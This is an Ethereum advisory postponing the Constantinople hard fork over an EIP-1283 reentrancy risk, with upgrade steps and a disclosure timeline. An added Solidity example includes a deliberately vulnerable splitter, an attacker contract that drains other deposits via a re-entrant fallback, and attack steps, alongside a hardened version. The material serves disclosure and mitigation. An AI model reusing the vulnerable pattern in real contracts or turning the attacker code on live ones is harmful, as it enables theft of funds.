Ethereum core developers and the Ethereum security community were informed of potential Constantinople-related issues identified by ChainSecurity on January 15, 2019. We are investigating any potential vulnerabilities and will follow up with updates in this blog post and on social media channels.
Out of an abundance of caution, key stakeholders in the Ethereum community have determined that the best course of action will be to delay the planned Constantinople hard fork that would have occurred at block 7,080,000 on January 16, 2019.
This will require anyone running a node (node operators, exchanges, miners, wallet services, etc.) to upgrade to a new version of Geth or Parity before block 7,080,000. Block 7,080,000 will occur in approximately 32 hours from the time of this post or approximately Jan 16 8:00pm PT / Jan 16 11:00pm ET / Jan 17 4:00am GMT.
What do you need to do?
If you only interact with Ethereum and do not run a node, you do not need to do anything.
Miners, exchanges, node operators:
- Update your Geth and/or Parity instances when they are released.
- These releases have not yet been published. We will update this post when they are available.
- Links, version numbers, and instructions will be provided here when available.
- We expect to have updated versions in 3-4 hours from the time this blog post is published.
Geth
- Upgrade to 1.8.21, OR
- Downgrade to 1.8.19, OR
- Stay on 1.8.20, but start it with the ‘--override.constantinople=9999999’ switch to postpone the Constantinople fork indefinitely (the switch must be passed on every start of the node).
Parity
Everyone else:
Ledger, Trezor, Safe-T, Parity Signer, WallEth, Paper Wallets, MyCrypto, MyEtherWallet and other users or token holders that do not participate in the network by syncing and running a node.
- You do not have to do anything.
Contract Owners
- You do not have to do anything.
- You can choose to examine the potential vulnerability analysis and check your contracts.
- However, you do not have to do anything, as the change that would introduce this potential vulnerability will not be enabled.
Background
ChainSecurity's article explains the potential vulnerability and how smart contracts can be checked for it. In short:
- EIP-1283 introduces cheaper gas costs for SSTORE operations.
- Some smart contracts (already on-chain) may use code patterns that would make them vulnerable to a reentrancy attack after the Constantinople update took place.
- These smart contracts would not have been vulnerable before the Constantinople update.
Contracts with an increased likelihood of being vulnerable are those that use a transfer() or send() call followed by a state-changing operation. The reason is that transfer() and send() forward only a 2300 gas stipend to the recipient: today no SSTORE that changes a stored value fits in that stipend, but under EIP-1283 a write to a storage slot that was already modified earlier in the same transaction costs 200 gas and does fit, so the recipient can alter state in the middle of the calling function. An example of such a contract would be one in which two parties jointly receive funds, decide how to divide those funds, and initiate a payment of those funds.
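To make the pattern concrete, the following is an added illustrative example in Solidity 0.5 (the compiler line current at the time of this post). It is not code from this post or from ChainSecurity, and every contract, function and variable name in it is invented. It shows a two-party splitter whose payout() reads the agreed split again after a transfer(), an attacker contract that exploits that ordering under EIP-1283 gas pricing, and a hardened payoutSafe() that snapshots the split before any external call.

```solidity
pragma solidity ^0.5.0;

// Added illustrative example; not code from this post or from ChainSecurity.
// All names are invented. A splitter holding funds for many agreements in
// one contract balance.
contract PaymentSplitter {
    struct Agreement {
        address payable first;
        address payable second;
        uint256 firstShare;  // percent (0..100) paid to `first`
        uint256 balance;
    }
    mapping(uint256 => Agreement) public agreements;

    function open(uint256 id, address payable first, address payable second) external {
        require(agreements[id].first == address(0), "exists");
        agreements[id] = Agreement(first, second, 50, 0);
    }

    function deposit(uint256 id) external payable {
        agreements[id].balance += msg.value;
    }

    // Either party may change the split (a real contract would require
    // both parties' signatures; omitted here).
    function setShare(uint256 id, uint256 share) external {
        Agreement storage a = agreements[id];
        require(msg.sender == a.first || msg.sender == a.second, "not a party");
        require(share <= 100, "bad share");
        a.firstShare = share;
    }

    // VULNERABLE after EIP-1283: transfer() forwards only a 2300 gas stipend.
    // Before Constantinople any value-changing SSTORE costs at least 5000 gas,
    // so the recipient's fallback cannot modify firstShare. Under EIP-1283 an
    // SSTORE to a slot already written earlier in the same transaction costs
    // 200 gas, which fits in the stipend, so firstShare can change between the
    // two transfers and the second payout is computed from the altered value.
    function payout(uint256 id) external {
        Agreement storage a = agreements[id];
        uint256 amount = a.balance;
        a.balance = 0;
        a.first.transfer(amount * a.firstShare / 100);
        a.second.transfer(amount * (100 - a.firstShare) / 100); // re-reads storage
    }

    // HARDENED: snapshot every value the payout depends on before the first
    // external call (checks-effects-interactions), so a re-entrant setShare()
    // cannot influence this payout whatever SSTORE costs.
    function payoutSafe(uint256 id) external {
        Agreement storage a = agreements[id];
        uint256 amount = a.balance;
        uint256 share = a.firstShare;
        a.balance = 0;
        a.first.transfer(amount * share / 100);
        a.second.transfer(amount * (100 - share) / 100);
    }
}

// Illustrative attacker registered as `first` of agreement ID.
contract Attacker {
    PaymentSplitter target;
    uint256 constant ID = 1;  // constant: an extra SLOAD would eat into the stipend

    constructor(PaymentSplitter t) public {
        target = t;
    }

    function attack() external {
        target.setShare(ID, 100); // dirties the firstShare slot in this transaction
        target.payout(ID);        // first transfer pays 100% to this contract ...
    }

    function () external payable {
        // ... and this fallback, running on the 2300 stipend, flips the share
        // to 0 so the second transfer also pays 100%, moving deposits made for
        // other agreements to the two parties. A low-level call is used because
        // the compiler's high-level call adds an EXTCODESIZE check (700 gas).
        // Whether the re-entrant write fits in the stipend depends on the exact
        // compiler output; the pre-Constantinople SSTORE price rules it out
        // regardless, and the failed inner call is simply ignored here.
        address(target).call(abi.encodeWithSelector(target.setShare.selector, ID, 0));
    }
}
```

Deploy PaymentSplitter, open agreement 1 with the Attacker as `first`, fund it and at least one other agreement, then call attack(). On a pre-Constantinople chain the re-entrant setShare() runs out of gas inside the stipend and payout() pays the 100/0 split that was set; with EIP-1283 pricing the second transfer is computed from the flipped share. The mitigation that does not depend on gas pricing is to stop treating transfer()/send() as reentrancy protection: finish all state reads and writes before the external call, as payoutSafe() does, or use an explicit reentrancy guard.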
How was the decision made to postpone the Constantinople hard fork?
Security researchers such as ChainSecurity and Trail of Bits have performed (and continue to perform) analysis across the entire blockchain. They found no instances of this vulnerability in the wild. However, there is still a non-zero risk that some contracts could be affected.
Because the risk is not zero and the amount of time required to confidently determine the risk is greater than the amount of time available before the planned Constantinople upgrade, the decision was made to postpone the hard fork out of an abundance of caution.
Parties involved in the discussions included, but were not limited to:
Timeline
3:09 a.m. (Pacific Time)
- ChainSecurity responsibly discloses a potential vulnerability through the Ethereum Foundation’s bug bounty program
8:09 a.m. (Pacific Time)
- The Ethereum Foundation asks ChainSecurity to publicly disclose
8:11 a.m. (Pacific Time)
- Original ChainSecurity article published
8:52 a.m. – 10:15 a.m. (Pacific Time)
- Discussion occurs through various channels regarding potential risks, chain analysis, and steps to be taken.
10:15 a.m. – 12:40 p.m. (Pacific Time)
- Discussion via Zoom audio call with key stakeholders. The discussion continues on Gitter and other channels as well.
12:08 p.m. (Pacific Time)
- The decision is made to delay the Constantinople upgrade
1:30 p.m. (Pacific Time)
- Public blog post published on various channels and social media
This article was produced in a collaborative effort by EvanVanNess, Infura, MyCrypto, Parity, Status, The Ethereum Foundation, and Ethereum Cat Herders.